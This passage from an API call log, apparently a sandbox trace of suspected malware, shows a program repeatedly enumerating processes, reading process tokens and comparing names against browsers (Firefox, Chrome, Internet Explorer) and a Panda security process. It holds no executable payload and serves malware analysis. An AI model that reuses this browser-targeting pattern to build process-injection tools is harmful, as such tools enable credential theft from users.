(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0137.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0137.890] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.890] CloseHandle (hObject=0x2f0) returned 1 [0137.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0137.890] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0137.890] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0137.890] GetLastError () returned 0x7a [0137.891] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0137.891] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0137.891] CloseHandle (hObject=0x2ec) returned 1 [0137.891] CloseHandle (hObject=0x2f0) returned 1 [0137.891] GetLengthSid (pSid=0x54010a8) returned 0x1c [0137.891] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0137.891] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0137.891] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0137.891] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0137.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0137.891] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0137.891] CloseHandle (hObject=0x2f0) returned 1 [0137.892] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0138.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xfa50) returned 0xc0000004 [0138.889] VirtualAlloc (lpAddress=0x0, dwSize=0x10a50, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0138.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10a50, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0138.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0138.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0138.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0138.895] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.895] CloseHandle (hObject=0x2f0) returned 1 [0138.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0138.896] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.896] CloseHandle (hObject=0x2f0) returned 1 [0138.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0138.896] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.896] CloseHandle (hObject=0x2f0) returned 1 [0138.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0138.896] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.896] CloseHandle (hObject=0x2f0) returned 1 [0138.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0138.896] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.896] CloseHandle (hObject=0x2f0) returned 1 [0138.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0138.897] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.897] CloseHandle (hObject=0x2f0) returned 1 [0138.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0138.897] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.897] CloseHandle (hObject=0x2f0) returned 1 [0138.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0138.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0138.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0138.897] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.897] CloseHandle (hObject=0x2f0) returned 1 [0138.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0138.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0138.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0138.898] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.898] CloseHandle (hObject=0x2f0) returned 1 [0138.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0138.898] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0138.898] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0138.898] GetLastError () returned 0x7a [0138.898] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0138.898] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0138.898] CloseHandle (hObject=0x2ec) returned 1 [0138.899] CloseHandle (hObject=0x2f0) returned 1 [0138.899] GetLengthSid (pSid=0x54010a8) returned 0x1c [0138.899] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0138.899] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0138.899] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0138.899] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0138.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0138.899] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0138.899] CloseHandle (hObject=0x2f0) returned 1 [0138.900] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0139.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xfa00) returned 0xc0000004 [0139.911] VirtualAlloc (lpAddress=0x0, dwSize=0x10a00, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0139.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10a00, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0139.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0139.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0139.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0139.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0139.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0139.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0139.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0139.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0139.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0139.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0139.916] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.916] CloseHandle (hObject=0x2f0) returned 1 [0139.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0139.916] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.916] CloseHandle (hObject=0x2f0) returned 1 [0139.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0139.916] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.916] CloseHandle (hObject=0x2f0) returned 1 [0139.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0139.916] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.916] CloseHandle (hObject=0x2f0) returned 1 [0139.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0139.916] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.916] CloseHandle (hObject=0x2f0) returned 1 [0139.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0139.917] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.917] CloseHandle (hObject=0x2f0) returned 1 [0139.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0139.917] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.917] CloseHandle (hObject=0x2f0) returned 1 [0139.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0139.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0139.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0139.917] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.917] CloseHandle (hObject=0x2f0) returned 1 [0139.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0139.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0139.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0139.917] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.917] CloseHandle (hObject=0x2f0) returned 1 [0139.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0139.917] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0139.917] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0139.918] GetLastError () returned 0x7a [0139.918] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0139.918] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0139.918] CloseHandle (hObject=0x2ec) returned 1 [0139.918] CloseHandle (hObject=0x2f0) returned 1 [0139.918] GetLengthSid (pSid=0x54010a8) returned 0x1c [0139.918] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0139.918] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0139.918] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0139.918] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0139.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0139.918] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0139.918] CloseHandle (hObject=0x2f0) returned 1 [0139.919] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0140.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xfb90) returned 0xc0000004 [0140.976] VirtualAlloc (lpAddress=0x0, dwSize=0x10b90, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0140.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10b90, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0140.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0140.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0140.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0140.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0140.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0140.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0140.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0140.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0140.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0140.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0140.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0140.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0140.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0140.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0140.985] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.985] CloseHandle (hObject=0x2f0) returned 1 [0140.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0140.985] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.985] CloseHandle (hObject=0x2f0) returned 1 [0140.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0140.985] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.986] CloseHandle (hObject=0x2f0) returned 1 [0140.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0140.986] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.986] CloseHandle (hObject=0x2f0) returned 1 [0140.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0140.986] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.986] CloseHandle (hObject=0x2f0) returned 1 [0140.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0140.987] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.987] CloseHandle (hObject=0x2f0) returned 1 [0140.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0140.987] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.987] CloseHandle (hObject=0x2f0) returned 1 [0140.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0140.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0140.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0140.988] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.988] CloseHandle (hObject=0x2f0) returned 1 [0140.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0140.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0140.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0140.988] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.988] CloseHandle (hObject=0x2f0) returned 1 [0140.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0140.989] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0140.989] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0140.989] GetLastError () returned 0x7a [0140.990] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0140.990] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0140.990] CloseHandle (hObject=0x2ec) returned 1 [0140.990] CloseHandle (hObject=0x2f0) returned 1 [0140.990] GetLengthSid (pSid=0x54010a8) returned 0x1c [0140.990] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0140.990] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0140.990] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0140.990] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0140.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0140.991] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0140.991] CloseHandle (hObject=0x2f0) returned 1 [0140.991] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0142.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xfde0) returned 0xc0000004 [0142.080] VirtualAlloc (lpAddress=0x0, dwSize=0x10de0, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0142.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x10de0, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0142.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0142.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0142.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0142.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0142.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0142.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0142.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0142.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0142.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0142.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0142.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0142.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0142.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0142.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0142.087] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.087] CloseHandle (hObject=0x2f0) returned 1 [0142.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0142.088] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.088] CloseHandle (hObject=0x2f0) returned 1 [0142.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0142.088] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0142.088] CloseHandle 